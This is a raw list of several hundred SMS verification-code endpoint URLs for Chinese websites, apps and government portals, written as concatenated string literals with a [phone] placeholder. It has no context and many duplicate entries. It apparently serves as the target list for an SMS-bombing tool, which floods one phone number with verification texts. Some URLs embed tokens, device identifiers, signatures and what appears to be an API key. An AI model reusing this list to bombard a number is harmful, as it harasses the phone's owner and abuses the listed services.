"https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=10", + "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", + "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", + "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]&yzm=148323267", + "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App%20Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", + "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", + "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", + "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://www.zuisgo.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&firewallToken=jkjslfskjk8545sfsdf&uid=&token=&loginTime=&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]&request_ts=1564116332", + "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", + "http://skyapp.mackentan.com/app/v5/login/verifyuser.do?t=1565488775000&did=EVrRL0SJdF8b4aa87b41&ver=170&it=434857&username=[phone]&fit=434857&sign=df42d291c6c8487aab384f3da2f5a42f6920e76b&appid=com.jediapp.changgejiaoxue&idfa=5C351103-F887-4932-BC59-58C75875EFDE", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", + "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", + "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://www.sbsq.aliwe.com/index.php?s=/api/mobile_verify_code_get_request/index2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "http://w.xyhsoft.com:80/pypay/xyhpay/util/ZsendCode.do?phone=[phone]", + "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.qmxgz.cn/api/Sms/send?phone=[phone]", + "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://uc.maodou.com/server/account/sendLoginCode?phone=[phone]", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]&type=1", + "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", + "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]&IsAutoReg=true&TopicID=94149&IsPreview=false&__r=1542430774915", + "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", + "http://xst.520xst.com/xst/getCode?callback=jQuery111009421744498287961_1580993309090&sex=0&channel=hyapp1001&mobile=[phone]&src=napp_ios_2138&interfaceCode=1&type=quickLogin&osType=1&bp=5bm/5Lic&s=eyJrIjoiM2RhNTM3MjFlOWFlYmFmNTQxZmQ2MjI5NTU0NDgzMDUiLCJTIjoiamluZ3l1", + "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", + "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App%20Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8%2C1&device_name=iPhone%206s&languageCode=zh&latitude=29.587192&localeIdentifier", + "https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", + "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", + "https://api.taoelement.vip/account/sms/sms/captcha/[phone]/mineTker", + "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", + "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://app.zhigoukeji.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", + "http://www.gangaimall.com:80/mbb-web/api/account/code?mobile=[phone]&type=0", + "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", + "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", + "http://www.weimaiyy.com/register/sms?t=0.6886729517940704&phone=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", + "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://dakaapp.troila.com:443/api/v7/index/send_sms?phone=[phone]&expect=0", + "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", + "http://koudaitong.com/v2/common/sms/imgcaptcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&captcha_code=0722&_=1430461129948&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=+86&validateType=1", + "http://tel.kuaishang.cn/ajax.php?act=sendmsg&author=%E9%BD%90%E6%99%A8&fromurls=http%3A%2F%2Fwww.mianfeidianhua.net%2Fhsnzy.html&content=%E6%83%B3%E5%92%A8%E8%AF%A2%E3%80%82&did=382&uid=2010131726&phone=[phone]&_=1551173567919", + "https://s-web.jtljia.com/mvc/message/vcode/user_welcome/[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://xst.520xst.com/xst/getCode?callback=jQuery111009421744498287961_1580993309090&sex=0&channel=hyapp1001&mobile=[phone]&src=napp_ios_2138&interfaceCode=1&type=quickLogin&osType=1&bp=5bm/5Lic&s=eyJrIjoiM2RhNTM3MjFlOWFlYmFmNTQxZmQ2MjI5NTU0NDgzMDUiLCJTIjoiamluZ3l1", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://i.zhaopin.com/Login/LoginApi/SendBindSms?jsoncallback=jQuery16402676061029242586_1454143948438&businessType=C-Bind&t=1454143948656&_=1454143948656&mobile=[phone]", + "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", + "http://user.daojia.com/mobile/getcode?mobile=[phone]", + "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", + "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", + "http://www.imdxd.com/api/method/getCode?phone=[phone]&type=2", + "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", + "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", + "https://m.zhaopin.com/api/capi?capiUrl=passport/getSmsCodeSecurity&mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", + "https://m.rong360.com/mobile/Wxpageforapp/SendSmsVcode?mobile=[phone]&callback=rong_json1565594522310&v=7620", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://api-v1.ezpaychain.com/invoice/v1/user/send-sms?calling_codes=+86&phone_number=[phone]&type=activation&version=1", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?platform=console&token=&phone=%2B86[phone]&code=10164337", + "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", + "https://couple-api.jizhangapp.com/login/captcha/[phone]", + "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", + "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", + "http://api.qingmang.me/v1/account.sendVerification?platform=console&token=&phone=%2B86[phone]&code=10164337", + "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", + "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", + "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", + "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", + "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", + "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone%206S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]&platform=iOS&token=&userId=-1&version_code=110", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://121.36.193.131/api/v3.1/thirdpartyapi/aliyunmessageapi/SendVerifyMessage?phoneNumber=86[phone]&type=1", + "http://activity.renren.com:80/livecell/ajax/tryVerify?sanbox=a&phoneNum=[phone]", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]", + "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone%206S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]&platform=iOS&token=&userId=-1&version_code=110", + "http://group.leying.com/user/send-login-or-reg-validate-code?.sig=485fcbb8de19a6031a640e4fba81b7d7&cinema_id=23&city_id=502&client_id=3e5da9998f896&graph_validate_code=&group=20008&mobile=[phone]&pver=7.0&session_id=&source=105001&ver=5.5.5", + "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.2847588&imei=F3F6BCC9-", + "https://m.mgqr.com:443/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", + "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App%20Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8%2C1&device_name=iPhone%206s&languageCode=zh&latitude=29.587192&localeIdentifier", + "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", + "http://my.ikang.com/loginUserReg/getGenerateCode?phone=[phone]", + "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", + "http://user.daojia.com/mobile/getcode?mobile=[phone]", + "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", + "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", + "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]&token=d19f72dbe0834107ae2007fc43d8ab79&secret=aKM2o9pwNeUkhmxx5z7RuQ%3D%3D", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + 